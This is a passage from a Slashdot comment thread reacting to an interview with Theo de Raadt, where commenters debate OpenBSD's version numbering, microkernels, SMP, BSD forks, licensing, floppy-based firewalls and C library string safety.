exact same code, and therefore I should check the Changelog? I'm not asking alot. I'm merely asking the question: What do version numbers mean, if they *aren't* snapshots of code? --Dan Re:No upstream (Score:2) --Dan Re:No upstream (Score:2) --Dan Theo: Version Number Specifics (Score:5) I don't think it's fair to say, as you did, that "ftpd is ftpd" or "tar is tar" for all of OpenBSD. Examples from version lines throughout OpenBSD: spork# perl -v This is perl, v5.6.0 built for sparc-openbsd bash-2.04# GNU troff version 1.15 bash-2.04# nawk -V awk version 19990620 bash-2.04# gcc -v Reading specs from gcc version 2.95.2 19991024 (release) bash-2.04# Concurrent Versions System (CVS) 1.10.7 (client/server) [vi Version 1.79 (10/23/96) The CSRG, University of California, Berkeley. bash-2.04# tcpdump version 3.4.0 libpcap version 0.5 bash-2.04# Server version: Apache/1.3.12 (Unix) Server built: May 5 2000 14:44:59 Look. Some of these you modified. Maybe all of em. Maybe one of em(I *know* you touched Perl.) Lets take the example of tires, why don't we. If I've got Firestone Model X432LFR tires on my car, and I run down to the dealership asking why I'm driving a deathtrap, is he allowed to laugh at me because "Of course *we'd* never put the deadly X432LFR tires on your car, we'd only put the *good* X432LFR tires on! Stupid customer." That's essentially what happened with Debian a while back, and it was infuriatingly unfair. I'm not asking you to do more work, Theo--you've *done* the work. I'm asking you to admit it, mark it, brand it in such a way that we know you've been forced to do something to it to make it secure. And then all of us can bitch and moan to the author's of whatever package you've taken and say, "Heh, he changed your stuff, maybe there's something you should look at." Maybe we'll be ignored. But, in the end, *you* did the right thing. Theo: You and your team rewrote much of an early build of SSH. Technically, you could have said, "Here's SSH1.2.1x, as part of the OpenBSD system." But then nobody would have known what you had pulled off, and people would have had trouble finding your specific improvements. I'm not saying you need to rename every package to show how much you've added. But to keep the original version numbers is to conflate your secure and solid version with whatever bugs you *know* lurk in other people's code. When Foobar 1.2 comes out with a remote root, and OpenBSD ships with Foobar 1.2, do you like--or enjoy--when system administrators frantically upgrade your *already fixed version* of Foobar 1.2 with the original author's possibly broken Foobar 1.3? Because that's what your version numbers cause. They're easy to fix, Theo. It's just a tag to let us know you fixed something. It's something for us to differentiate your code with. (Incidentally--what does little on my 2.7 Sparc build.) Consider this: As much as you say you've only dealt with the system, I *know* many of the packages from Ports have had patches that didn't modify version numbers--and I have *no* idea if anything's been modified in your packages section. I just don't know. This is not a problem specific to you, but I think OpenBSD is in the right place to change what I consider to be a particularly pernicious industry practice. I believe in your systems approach, but a secure system cannot be built from insecure parts. If you've secured your parts--show this, and perhaps let us know where to look to find out how. Yours Truly, Dan Kaminsky DoxPara Research Re:Theo and Microkernels (Score:2) What userland protection helps is stability ; less code that can deref a bad pointer, etc. What it can't help is the quality of the code. At the end of the day, an attempted attack will try to make the code make the wrong decision; i.e. allow something to happen that shouldn't have, or do something that is shouldn't have. That has nothing to do with whether or not it causes a segfault somewhere else. Although some attacks could make monolithic kernel code do something to other code segments somewhere else, it really isn't all that likely or often used. Attacks tend to be against making code call the wrong routine, set a variable the wrong way, etc. That stuff can't be helped with microkernels. Sorry, all microkernels are really good for are (1) loadable features (no recompiling), (2) crash protection. But, they do the traditional tradeoff of speed for it (multiple context switches for a single system call, etc.). But, anyone else get the feeling that a good portion of the questions Theo did respond to were all asking the same thing: what common errors do you end up fixing? Not a horrible question to answer by far. Sure you could say 'bad code,' but a list of good examples of security-critical mistakes are far more helpful. -- "But it works." (Score:3) See also: the "HTML" on the supposed "geek web site" called Slashdot. (as well as, to be fair, the rest of the web.) Hey, where's my question? (Score:3) Mac OS X & BSD [slashdot.org] I'm curious about how the BSD folks view the impending couple million new users they've got heading their way when MacOS X is released. Please, no Mac-rants, they're trite & off-topic. I just wanna know about the question. Re:Forks are Good! (Score:2) No upstream (Score:4) As a Linux user, one comment Mr de Raadt made surprised me: In Linuxland, cat is GNU cat, tar is GNU tar, httpd comes from the Apache project, rpm comes from Red Hat, and so on. There is always an upstream maintainer for any particular package and no distributor (AFAIK) tries to maintain its 'own' releases of things. If a bug is found, the fix tries to swim upstream to the breeding ground, where it can add itself to the gene pool for future releases of all distributions. (Alas, I do not have a ten-man team auditing my comments for dodgy metaphors.) I suppose it makes sense in a way to have your own codebase, especially if you are concentrating more on security than on adding new features. You have control over every line of code that goes in, and you don't mind missing out on new versions of stuff that is released. Also, if your original 'upstream source' is a group of people you split acrimoniously from, you might prefer not to rely on them. (Although I can't help feeling that if the OpenBSD and NetBSD people made more of an effort to commonize code in both directions, the feud wouldn't have lasted as long. This sort of thing going on between two Linux distros - eg Mandrake and RedHat - would be unthinkable.) But not relying on an upstream maintainer for packages does not mean you can't contribute your fixes back. All the BSDs originate from a common code base, right? There must surely be at least 95% common code in the shell and shell utilities (which change relatively slowly), even if the kernels have diverged. So what effort do they make to avoid reinventing the wheel? And when OpenBSD fixes a set of bugs, do they report them to the maintainers of the original package? Perhaps the problem would be that they couldn't agree on who should be the original source. Imagine if NetBSD claimed that they were now the 'official' maintainers of BSD make, for example. Would OpenBSD accept that? Perhaps some neutral 'BSD Foundation', with support from all three free BSDs, could take over maintenance of the common or fairly-common BSD code. Or somebody from Berkeley (Bill Joy perhaps?) could make a ceremonial proclamation. About a secure ports tree (Score:2) Re:This is ridiculous. (Score:2) Perserverence is not always a sign of strength or skill. Once you learn how to add, you move on to multiplication. I have a similar tendency to like DOS. I have spent a whole lot of time playing with it, and am not afraid to say that I know it well. DOS is very simple, but very stable, meaning that there is rarely anything new for it. I know that the latest version of Norton Utilities for DOS will be 8.0, and the latest version of NC will always be 5.0. I know how to fix things in it. However, I also know that it is old and not good, which is why I don't use it anymore (except for the occasional 5-day contract at some company with a bunch of 386es). I am instead trying new things. Single processor x86 Unix and C are nice and safe. SMP is new stuff, and you no longer feel warm and comfy there, sort of like getting out of bed on a winter morning. But you have to get out of bed... that's the way the whole thing works. :-) -- Re:Working with microkernels (Score:2) Microkernels are just a whole lot more work to implement... they don't have the resources or the interest. I think OpenBSD just wants to produce a simple and secure BSD variant for uniprocessor micros... not be the Ultimate OS. "Free your mind and your ass will follow" Theo misses a point (Score:3) system (firewall/router, et.al.) is not to use the floppy, but, to make it simpler to configure than "BOOTP/Diskless". In a floppy-based system like that (firewall), the floppy would be used to boot the host, that is all. The goal is to have *NO* disks, or any other moving parts. Re:No upstream (Score:2) * And maybe this page: * For Debian I have: * If I need to get the code difference I use diff either on the OpenBSD source tree of the debian source tree. But when there comesa security hole it's usally a note on what OS the hole works on. If a patchg exists the time to find out if one need to add the patch is usally very small. (Actually it's selldom upgrade to this new version that has this fix and all this new features...) Re:GPL? (Score:2) Re:BAH! (Score:2) Question: How do I became a good refeeree? Answer: I suppose the best tip is to go a loot of fights. (Even thous one could wonder if this fits to boxing.) / Balp Re:Pizza 'n' Beer (Score:2) Pizza maybe, I've never seen beer associated with geekdom. Bunch of namby-pambies with their Jolt Cola usually, I prefer to code with a nice thick guiness in hand (tho not with beer, i like fat tire with my pizza) For the record, I also hate twinkies. -- Re:Theo and Microkernels (Score:2) In theory. In theory, microkernels could just swap out pieces of the system for independently developed implementations, and a change in one component need only affect that component (orthogonality). In practice, microkernels tend to just replace function calls with messages and their components remain tightly coupled as ever, so a failure (such as a security flaw) in one will tend to cascade to the other components in the system. Projects like OSKit offer hope for a more orthogonal OS design, but I'm not holding my breath. -- Re:But he doesnt follow his own advice (Score:2) An all-too appropriate word, considering the word means "nowhere". Show me paradise in any OS today. Lead me to the Buddha in the machine. -- Re:Where the money goes (Score:2) Just because Americans can't make beer that doesn't taste like mouldy water doesn't mean that Canadians are equally challenged. Next time you're up in the great white north try and get your hands on something made by Big Rock breweries of Calgary. That's good beer. Never heard of them. Just as you've likely never heard of Left Hand or Wynkoop or Broadway Brewing or any of the HUNDREDS of craft breweries in the US, probably an order of magnitude more than any other country in the world. Those three are just three ones in Colorado alone (home of Coors, lightly flavored spring water in a can) that I could name off the top of my head. We all carry six-shooters and wear stetson hats too, you know? -- Re:filtering by FreeBSD/NetBSD (Score:2) YHBT. HAND. This guy you responded to is a troll who posts the exact same post in every single BSD article. Just ignore him, he's just another reason I normally browse at threshold 2 til I get bored. -- Re:A reply to his reply to my questions. :) (Score:2) Bill Joy was one of the original authors of BSD. And vi too (*sigh*). -- Re:Mr.Sparkler (Score:2) So that he doesn't get taxed as a for-profit business. Non-profit doesn't mean you can't draw a reasonable (or even comparatively handsome) salary if you choose to take one. -- Re:why bother? (Score:2) You want documentation written by people who needed the documentation in the first place and didn't get any? Neat trick. I think I'll write a treatise on nuclear physics in order to teach myself. See Dick -- Re:why bother? (Score:2) -- Why you should be afraid of forking. (Score:3) snip Why are you guys so fork paranoid? Looks to me like you've already answered your own question, Theo. - Before flaming Theo ... (Score:5) And what's wrong with that? OK, he's no "Dear Abby", but neither is RMS. I know many here aren't big RMS fans, but are you insecure enough about your own little world that when someone says, "Quit bothering me with stupid details, just write the code" you start flipping out? I attended Supercomputing '99 and went to a talk by Thomas Sterling, one of the original Beowulf pioneers at NASA. A good chunk of his talk was spent complaining about "Linux cruftiness" and "why are you people here when you could be writing code"? I admit I was somewhat pissed coming out of it, but it did have the effect of motivating me to start programming again. I think sometimes we just need a swift kick in the arse from someone (hi Greg!) to get motivated. Bottom line: ignore the stupid "Are you mad?" comments from someone whose ego is a bit too big to take the time to be polite, and focus on the "learn your APIs, understand your APIs, and stop writing shitty code." Learn the message, ignore the messenger. -jdm (I'm ready for my big Mod-down, Mr. Director :)). Missing the point on floppy-based routers? (Score:5) Flash RAM would be perferred, but flash disks are hardly ubiquitous and free-for-the-taking x86 systems that work great as routers don't generally have flash-based disks installed. A floppy drive is almost a given in any system. The hardware advantage of a system without a hard disk is the reduction of heat generation, meaning they're easier to put in heat-hostile environments like telephone closets. System upgrades are a snap, since you just move the disk to another platform. As far as security goes, other than floppy disks general lack of reliability, what's the problem with them? They're physically write-protecable, which many IDE disks aren't. Sure it's easier to swap a floppy out than a HD, but if your machine doesn't have physical security to begin with you've failed the first checklist item for security. BAH! (Score:3) Any advise for code auditers? Theo: I suppose the biggest tip would be to become a better programmer. Bah Humbug! Thats equivalent to Question: How do I become a better sprinter?? Theo: I suppose the biggest tip would be to just to run faster Re:No upstream (Score:2) In addition, every packages has a Debian.changelog that should have information about what changes have been added in the Debian version. Yeah kinda how the 'original' unix forked... (Score:2) Unneeded complexity is bad, mkay? GPL? (Score:2) Re:This is ridiculous. (Score:3) Maybe being able to use a system as a firewall/gateway that makes me sleep at night because i feel confident that it will not get h4X0red. I really don't give a fsck if it doens't have SMP support. What's the REAL percentage of online SMP boxes anyway? I'll admit the it is really nice (and usefull) but i'm sure there's a majority of sites that simply don't need it (yet). --------------------------- "What is the most effective Windows NT remote management tool? Re:I/O bound? (Score:2) That's the key point - I wouldn't really use OpenBSD for what you describe; probably one of the commercial unices which are tuned to the specific multi-proc hardware that they run on. For x86 and single-proc Sparcs though (the only archs I've used OpenBSD on), it rocks hard! SMP would be 'nice', but certainly not something I'd lose sleep over not having. Also, I would prefer it to be implemented properly, and not with horrible global kernel locks lying all over the place Re:This is ridiculous. (Score:4) Uh, right. So go ahead and write an entire operating system in a new language then. Don't forget to design the language first though! Remember the C-bashing thread on Bugtraq over the summer? Whatever its limitations, we are stuck with C 2. The proper approach seems to be a very limited operating system, perhaps in C, with a virtual machine over that which is proven secure, thereby giving at least strong security to every application then running ontop of that VM. Nice theory, much like many of the other 'ground-up' papers I've read. And meanwhile, while you sit posting and postulating on the great designs that will rule the operating systems world, I'll just use OpenBSD, and be happy with the stability and reliability of the system. Perhaps I'll look you up in ten years when you've finished this idea? What is the point? Why bother if you aren't even going to put in SMP? I really, really don't care whether or not OpenBSD has SMP. If I need a faster box, I'll just upgrade to a faster processor. The majority of server systems these days are either I/O or connectivity bound these days. Re:So You WANT to Be Exploited? (Score:2) Why are you so shocked? It's BSD. It is NOT exploitation. Nothing is stolen. The CVS repository does not disappear when a commercial company uses the software it contains. The people behind a given project continue to work on their project. That does not suddenly stop because some company is selling it or something based on it. 6 months later the project releases a new version. The company is still behind. They could work on it from the point they started using it, or they could use the new release. Since they have to keep tracking new rleases anyway, they could even (and many do) help by giving their changes back to the project. And even if they don't (and many do), the project members spent those hundreds of hours of work doing what they loved and could care less what some company does. They want the fruits of their labor to fall into as many hands as possible. BSD allows and encourages that. GPL zealots are hypocritical. If you're so worried about The Man making money off of you, why are you writing free software? Tell me, would you rather write free software because you WANT to or because you HAVE to? Re:This is ridiculous. (Score:2) That's a good point about firewalls, that's an important use of this OS. However, I would have though it would be easier to lock down a firewall machine with existing the existing OS than audit the whole thing? It's my understanding that this audit will attempt to make the OS more secure for more "dangerous" tasks, where more ports need to be open, more applications are running and generally the machine is used for more things. In that case, then I think SMP starts to become a necessity for any major server OS, otherwise it'll never be put on any of the really big machines that could benefit from all the enhanced security. This is ridiculous. (Score:4) Here's the main point, before we even get started: This project should be scrapped, there are easier and better ways to do what is being done here. Now the reasons. 1. The fact that you need to go back and hand audit libc calls for "subtle" errors means that the wrong language is being used for the majority of these tasks. For these types of ultra secure tasks, there should be extremely limited cases, and ideally no class of errors that would be "subtle" when it comes to standard library calls. I would suggest that C is not a good language to write a secure operating system in, because it very obviously requires too much manual labour to weed through the subtleties of it's operation. 2. The proper approach seems to be a very limited operating system, perhaps in C, with a virtual machine over that which is proven secure, thereby giving at least strong security to every application then running ontop of that VM. Yes you'll need to audit that first limited OS and kernel, and yes it'll probably be in C, but let's limit the scope of that code severely. Plan to take a huge performance hit on running everything on that VM but make sure that it's totally secure, do whatever it takes to make sure that everything running on it is protected from itself and other programs. This is the only possible way to make an extensible operating system that is in any way secure, otherwise any software that is later added to the system will either need to be painstakingly audited or not installed. Performance should be a minor concern at this point as VMs can later be optimized, and security should be of prime importance. 3. After they finish all this auditing, we're left with a non-SMP capable OS with limited software of a similarily secure nature to use it with. What is the point? Why bother if you aren't even going to put in SMP? 4. Theo is obviously so closed minded that no efficiency ideas are ever going to occur to him. Witness his response to the question about distributed kernels - (in summary) "I have no idea what they are, but they're not useful to me." Great. It is my opinion that people of this caliber of programming should be spending their time at doing more useful, or perhaps better thought out work. Moderate at will. Re:Hey, where's my question? (Score:2) Quite simply, it's about like asking him what he thinks of some large company deploying BSD/OS. The users aren't heading at Open/Net/FreeBSD, they're heading at Apple. Not like Theo's gonna get any emails from Joe Machead asking him how to change the system event sounds in OS X or anything. Pizza 'n' Beer (Score:2) In any case, lately I've noticed that a lot computer geeks have been trying very hard to shake that reputation, image, and social stigma. The modern "tech boom" has created this new social respect for people who used to be misunderstood, and so many of these people (luckily not including me) have been trying very hard to shake those easily caricatured "typical geek behaviors" while they have their time in the sun. I'm glad to see traditional geeks, down to caustic remarks about other people's coding (who else but a geek could that get worked up about it that it's a personal matter!). I'm glad, it makes me smile, 'cause that is the sort of person who made life interresting for me as a young geek, and hell, i hope they are around for ever... Re:BAH! (Score:2) If you think you can become a world-class runner by "just running" I think you are sadly mistaken. Besides, he even mentions that many programmers learn how to do it poorly, but when asked how to learn to do it correctly, he says, just do it. Overall this is a pretty shallow interview, it's obvious he'd rather be coding than answering questions. A good thing for OpenBSD the software, a bad thing for the image of OpenBSD. $.02 -- Re:So You WANT to Be Exploited? (Score:2) BSD advocates believe, I think, that given a choice between X for free and X' for a price, X' will cost only what the added value of the ' is worth. I would like to agree, and in a perfect market I would agree. But there is no perfect market in the world today. People, being morons, are quite happy to pay $x for X', where $x is the total value of X', not simply the added value, even though economically it would be smarter to use X for free, getting all the functionality of X' save ', but saving an amount of money equal to functionality(X)+'. People are the problem. The GPL is a nuisance, I agree. If this were a sufficiently more perfect world then I would most definitely use BSD. But it's not, and thus I don't. The BSD license allows more freedom--that's a good thing. But the GPL protects freedom. The one is like three acres of apples, exposed to the birds and the beasts. The latter is like an acra of apples, with farmhands to scare away the animals. At the end of the day, the tended land has more apples. Thus with the GPL. Re:I would've asked about automation of analysis.. (Score:2) Automated code modification would lead to a situation where the developers would just sit around and think of vunerabilites. Rather than haveing to look over the same code 14 times, and get to know it. There is something to be said for forcing yourself to pore over every line, every bracket, every semicolon of the code, and check everything. From what Theo said, it sounds like while they are fixing one sloppy piece of code, they note another bit when they are part way through. This makes lots of sense. Where are they going to find new mistakes from if they don't go through all the code. This is not just of the top of my head, btw. I write scientific code that has to be correct, where there is no way of testing the output. It's amazing how often subtle bugs are missed. -- Re:Forks are Good! (Score:4)? I suspect that the question was rhetorical, but it deserves an answer. I'm putting it here, with the other fork comment, even though it wasn't written as a follow-up to that comment. Simply put, it's (too) often used as an object lesson in Linux land. Whenever an argument gets too heated, someone jumps in with "if we keep acting like this, we'll end up like the BSDs." Meaning, I suppose, "fighting over a very tiny percentage of mindshare instead of working together to take over the world." I suspect that Linux is headed toward a fork. Linus and Alan Cox have been leaving things out of the kernel (like a debugger) that a lot of people want. As there's no charter or formal organizational structure, I think that a coup of some sort is inevitable. When it happens, the interest in the Net/Open split will rise to a crescendo. I have friends who are OpenBSD advocates, and others who are NetBSD advocates. To hear each side talk, the other side writes crappy code between bouts of trying to ruin BSD for everybody. It's depressing, particularly when I think about what could happen if their talents could be combined. Or, if they would just shut up, stop sniping at each other, and code. I'd love to see some sort of cross-bsd advocacy organization to help users take that middle step. Help with porting of cool shit between the BSDs. Make generic cross-BSD documentation. Help people decide which OS and user/developer community is right for them. etc. Unfortunately, that requires a friendlier attitude than I often see between the BSDs. Charges of "code theft" particularly frustrate me. That's the whole damned point of open source: Seeing the good stuff, learning from it, and using it. -- Re:distributed kernel ... (Score:3) Re:Where the money goes (Score:2) I'll agree that the US and Canada can't seem to make a decent beer... the US has a real bad track record... midwest megabrews, Natural Light, Utica, Keystone, anything that says 'ice', etc... Of course, the Guinness doesn't taste as good here in the Midwest, either... -- Re:Where the money goes - Totally OT (Score:2) I know of many pubs that brew their own stuff on the East coast, and it's worth the trip. -- Re:Where the money goes (Score:2) My favorite Canadian beer is Elsinore, since I found a mouse in the bottle... -- Re:No plans for SMP... (Score:2) As for the UberOS(TM) - That's where the ideas of microkernels and modules really comes into play. Granted, there are always tradeoffs, but theoretically, a microkernel is infinitely adaptable... -- Re:No plans for SMP... (Score:2) I wouldn't blame IBM for this, but then again, they give me a piece of paper twice a month... that, and I've seen [CENSORED - IBM Confidential]. So there! -- Re:Missing the point on floppy-based routers? (Score:3) It seems very difficult to obtain the same characteristics from a harddisk (or flash ram); I don't know how to physically prevent writing on a standard IDE hd. And if you use the hd just to load the FW into ram, and "hot-swap" it out, then it won't come back up, after powerfailure (even UPS's have their limits). Floppy disk reliability is not much of an issue, i think, since the floppy isn't used to as a long term storage medium. Remember your friend dd: "$ dd if=/dev/fd0H1440 of=floppy-image 2880+0 records in 2880+0 records out $ dd if=floppy-image of=/dev/fd0H1440 2880+0 records in 2880+0 records out $ The first dd makes an exact image of the floppy to the file floppy-image, the second one writes the image to the floppy." (SAG v. 0.6.2) (And of course, one can always mount the dd-image; "mount -t ext2 -o loop") So you develop, maintain and store, the actual FW information on another box, then write the image to a floppy (and making a backup fd image on the development box). All the floppy has to do, is to survive the initial boot. It may have to survive reboots, caused by powerfailure, but even if it does not (harddisks may fail too), a disaster recovery plan is part of the floppy disk based FW scheme; just write a new image, and boot. How many hd-based FW's has a spare harddisk, with a synced and updated system on it? If you just have a slight suspecion, that the FW is compromized, then a reboot will flush out any trojans and root kits. The firewall may still contain som sort of security hole, but rebooting may give you time to discover what the hole was, and deploy a new FW. Floppy based firewall is a very cool thing. It doesn't fit everybodies need, but it may be a viable solution to a great many. Cdroms may offer similar advantages, but they may be slightly more difficult and expensive to develop and maintain. In short; Firewalls on write protected media, seems to be a very good idea. Re:Missing the point on floppy-based routers? (Score:2) It's interesting that someone as massively detail-oriented as Theo de Raadt seems to be shooting from the hip so much when just talking/typing -- maybe Katz should write an expose about detail oriented people being sloppy and neo-Luddite Harper's readers on their off hours. Design vs. Implementation (Score:3) He then goes on to say that he really doesn't care about kernel design, so long as the kernel design works. These two issues are completely different. Lets face it - he's an implementation junkie. Which I would guess was not, and still is not, popular with the NetBSD crowd, as he probably had to step on a few toes... 'You're not using strcat correctly. You've introduced 6 exploitable bugs into the kernel' 'What do you mean I'm not using strcat correctly?? I've been coding since I was twelve years old!' Cyano Forking (Score:2) I just have to point out the flaw in this reasoning. A political party represents a unique ideology in an abstract sense. A fork also represents a unique ideology, but in a practical sense. If you're a democrat, you believe in welfare. If you're an OpenBSD developer, you believe in security AND you develop software towards that belief. The problem with too many forks (not that some aren't good) is that it thins programmer resources. The differences in implementation between two forks are, by definition, going to cause incompatibilities between them, meaning at some level programmers have to "choose sides" and decide which ideology to develop for, or do LCD compatibility. If you get too many forks in the open-source, it will be impossible to maintain the critical mass of programmers necessary for providing a comprehensive library of software which takes advantage of the specialties of any single system. In a political party, on the other hand, while many parties exist, "development" (i.e. practical implementation of ideology) is only going on in ONE place: the government. Your analogy would be more like if each political party decided to take over a different part of the US and declare itself sovereign, which is at this point clearly unproductive and inefficient given the way the US has adapted itself to function well as a single entity. The corrected analogy carries through well; in other countries we have good forks, which represent ideologies so different that forking is inevitable and staying together would be a resource drain. Of course, these things are self-limiting; an unnecessary fork will simply not be able to survive for long, or one of two similar projects will eventually end up gaining dominance and reducing the other one to a minority. The point is, forks are only good sometimes, and it's got nothing to do with political parties. What is a "black hole route"? (Score:2) What exactly does this mean? That packets from openbsd.org to netbsd.org are just swallowed without trace? Re:Missing the point on floppy-based routers? (Score:3) md5sum the whole floppy[*]. On booting, if the floppy image does not have the same checksum, abort. Then it's possible that the router might not boot one day, but it's impossible for the disk to corrupt without you noticing. [*]ok, md5sum all of the floppy apart from a file containing the md5sums. Re:This is ridiculous. (Score:2) Do it right! (Score:5) Hear, hear! Two of my pet peeves right there: (1) Why is it that the same bugs keep reappearing? Why is it that we assume bugs only occur in one place? Why is it that we hear, "I fixed the bug," as if a programmer can only screw up in one place? (2) Every other piece of engineering goes through major scrutiny. Teams are brought in from the outside to look over blueprints. For open source software, we assume that just because anybody can look at the code, that everybody is. Even in OSS, we need to go to outside, objective reviewers and say, "Here's some money, and here's our code [or maybe, here's the URL for our code :-) ]. Please review it and tell us where we screwed up." Mr. de Raadt knows his stuff; the coders do this themselves, and they take it seriously. charitable donations (Score:2) (And I must ask, why are people so cheap, that they only give donations when it provides a partial reduction in their taxes, rather than a real donation? I actually find that pretty fake.) Econ 101, Theo. It provides you with more money if people don't have to pay taxes on the money that they give. It's the same way that sales taxes are split between the store and the consumer simply because in the absence of sales taxes, the store could charge slightly more for a product. Don't make me start drawing supply & demand curves. Michael Re:What is a "black hole route"? (Score:2) I have entirely no knowledge of what events occurred between the two groups or whether they were fighting over a network and its routes, but that's the usual meaning. Hey! I've got an answer! (Score:2) I've got an answer for this one! Well, sort of - I don't know why people are cheap. But I do know why people who AREN'T cheap still would prefer to donate to a non-profit organization. First, the constrictions placed on a non-profit organization reassure some people that their donation stands some chance of being used for the purpose they think they're donating it to. Second, if I have $10,000 I don't need, and want to donate it to someone, if I donate it to a charitable organization in the U.S., I can donate $12,000 for the same eventual out-of-pocket as if I donated $10,000 to an organization without charitable tax-exempt status. So the second organization would have to convince me that it will make better use of my money. Sure, most people don't explicitly view it that way, but when you look at the bottom line, there's not much difference between "if I give $500 to them, I get $100 back. if I give $500 to THEM, I get nothing." and "if I give $400 to them, I could actually give $500. if I give $400 to THEM, I can only give $400." Re:filtering by FreeBSD/NetBSD (Score:2) If you're scared of spamming and mail bombing, stay off the internet. Frankly, any good admin worth his salt would want to see how his boxes stand up under such a load, rather than be a big weenie and run away from a fight. So what I read is: Theo threatened to mailbomb, and didn't? Link to mail thread [netbsd.org] Just bizarre. Frankly there are a lot of high horses out there. OpenBSD is a good system. I'm not a big fan of BSD, but I encourage people to use OpenBSD just to try it and learn. (I did run it for a while on a sparc and it ran better than linux on that box.) Every OS has it's place. OpenBSD is just canadian and has balls (big encrypted balls.) It's neat and it ships with things like ssh out of the box. I'm just very depressed lately (lately being a long time now) of hate-mailers and winers on slashdot--- the people who write the software (free) that we use (quality) often don't get the respect they deserve. Anyway, that's my 2 cents. Using your own numbers. (Score:2) Bob Bruce of BSDi (previously of Walnut Creek) says FreeBSD's user amount is 20% of the size of the linux market. If you consider FreeBSD and Linux all fighting for the same slice of the pie, how many of the 180+ linux distros have 20% marketshare? Lets see...given all distros have the same kernel, they are all alike. So the average market share for any linux distro is 0.55% or 1011 users per distro. So FreeBSD has a far greater marketshare and number of users than the average Linux distro for the Open Source OS market. 36400*5=182000 total linux users. counter.li.org [slashdot.org] says there are 162,680 Linux users. As you can see, the numbers presented as to why BSD is doomed are similar. It looks like the individual linux companies, none of them strong enough to get any useful market share (1,011 users per distro) will doom the Open Source OS market to appear as a failure. As you can see, Linux is very, VERY sick and its long term survival is very dim. And the stock prices of Linux companies show how doomed linux is. If Linux survives, it will be among OS hobbyists and die-hard users who read With the release of Apple's Mac OS X - based on BSD and selling 2 million units a quarter, you can see how just one quarter of Apple sales will outsell *ALL* of the Linux users. (So there. Nahy!) Re:But he doesnt follow his own advice (Score:2) -QNX [qnx.com] -VSTa [vsta.org] ----- "People who bite the hand that feeds them usually lick the boot that kicks them" Re:No plans for SMP... (Score:2) this certainly verified that point. can anyone think of other features that open source projects need that aren't done because there not interesting? -Jon Re:Do it right! (Score:2) Can you imagine if a Boeing engineer didn't fix ALL of the occurances of a wiring flaw? Why not at least try to engineer software in the same way? but what if? it's a lot of work, and not considered the most interesting thing to our developers. Sorry shit. what if it's not interesting to fix a big fat gaping hole? what if it's too much work, and "just not interesting!" gasp. -Jon Re:But he doesnt follow his own advice (Score:2) While this is a very subjective topic, many people would argue that the Mach Microkernel found in Next/Open Step is pretty good, and IIRC, the BeOS is pretty good Microkernel, too. Heh, I bet even l33t j03 [slashdot.org] would say Windows 2000 is a great Microkernel! Bashing Theo (Score:2) Re:Missing the point on floppy-based routers? (Score:2) In my eyes a floppy distribution includes features such as * Write protection * VERY VERY MINIMAL install (smaller than openbsd's 60-70 MB minimal install) NOT that it sits on a floppy. I usually make a good LRP disk and make a bootable cd. Reburn every month with updated nat forwardings and a new password. If someone DID hack into that box, there is no ftp/ssh/telnet on there for them to connect out! There is no way to write to a CD-R in a regular CD-ROM drive. Know your interfaces? Bah! (Score:2) But I have been compiling against the GNU C library a lot, and I loathe it for the most part. Examples? Examples. - from man strcpy: If the destination string of a strcpy() is not large enough (that is, if the programmer was stupid/lazy, and failed to check the size before copying) then anything might happen. Overflowing fixed length strings is a favourite cracker technique. - from man strcat: The strcat() function appends the src string to the dest string overwriting the `\0' character at the end of dest, and then adds a terminating `\0' character. The strings may not overlap, and the dest string must have enough space for the result. Yes, I especially loathe the string functions. If you feed them too small buffers, or NULL pointers, glibc just plain old crashes. In my not so humble opinion, it is glibc's _responsability_ as a C library to be flexible enough to allocate that stupid little buffer itself, or at least not to crash with segmentation violences! If I do the same things with GTK+'s glib, my program fails with a nice message, like "assert string != NULL failed" -- but even more often, it just allocates that stupid little buffer! Now before you're going to say "look, if you want someone to keep your hand, go play with Java, not with C", please realize that all this could just simply _work_ in C with a few checks, and that not a single line of code would need auditing for these "vulnerability" anymore, if only this check had been made in glibc! That's the use of programming libraries, right? Not having to do soemthing again and again, so that you work with well-known interfaces and do not run the risk of making much mistakes. You know, even Richard Stallman, author of this particular C library, agrees with me upon this point: - from info libc It's fairly common for beginning C programmers to "reinvent the wheel" by duplicating this functionality in their own code, but it pays to become familiar with the library functions and to make use of them, since this offers benefits in maintenance, efficiency, and portability. Now the only sad thing from this quote is that it actually comes from the part "Strings and Array Utilities" of info libc, about which _I_ would like to say "It's fairly common for beginning C programmers to become familiar with the library functions and make use of them, but it pays to duplicate this functionality in your own code" -- if you catch my drift Which makes me wonder how secure OpenBSD (and *BSD) is at the libc level, that is, how flexible and careful does it work with its input. [Hmm and while I'm at it, is char++ endian-independent? Just wondering It's... It's... Re:Before flaming Theo ... (Score:2) I have actually met Theo in person and he is NOT egotistical or arrogant in the slightest. He's quiet, reserved, and interesting. I think he's just impatient with a world where software quality standards aren't as high a priority as they should be. Re:Missing the point on floppy-based routers? (Score:2) It would also have to provide a nice (albeit simple and text-based) configuration tool or something similar to set up said box. Of course, it could provide more than just NAT and firewall. I don't care. But I do care about keeping the install minimal. That is why I mentioned FreeSco, a floppy-based product. Unfortunately, it seemed as though I was implying that I was only interested in firewall-on-a-floppy. Oh well. Re:No plans for SMP... (Score:2) YOu ignore a couple things in this though. First, I can't implement it myself, I am a medicore programer at best, and would not know where to begin. The poster was commentlin on the commercial viability of Open Source. Let's say my dad needs an OS for his bussiness, and somehow you mananged to dodge all the issues of actualy teaching him Unix, and getting him accept that that was some valid reason he should learn all this new stuff rather than just pointing and drooling through Windows. So dad here you go.. OpenBSD, the most secure OS in the world, course if you want to use on you dual CPU server, you are going to have to learn how to rewrite the Kernal for SMP support. Dad would laugh all the way to CompUSA. Commercial success is going to require more than "Just develop it yourself", if people were willing and able to do that, Windows would not have a 90 % marketshare. Re:But he doesnt follow his own advice (Score:3) You wrote In his first reponse, Theo wrote They don't care about good software, only about "good enough" software. Which I would paraphrase as software that doesn't make security a design goal. In his other response, Theo wrote As well, I don't think it makes any difference, as long as a system does what it is supposed to do. Which I would paraphrase as software should achieve it's design goals, like security, no matter how it's implemented. There is no contradiction in those two statements. Ego based contradictions (Score:3) As well, I don't think it makes any difference, as long as a system does what it is supposed to do. This is a fairly asinine thing to say, especially since the second post had a very good point (Micro vs Monolithic kernels). My opinion of Theo is fairly low after this. Instead of responding with a mea culpa (yes a micro kernal is better, of course it's better to keep privledged code to a minimum, but it's also difficult to totally re-engineer a kernel especially when it works) we get mindless thrashing about micro kernals.. (an operating system based on 70's technology dissing ideas from the 80's as obsolete? Kind of ironic..) Lighten up! (Score:2) In a word: He has no obligation to you, no matter how hard you try to rationalize that he does. He isn't charging 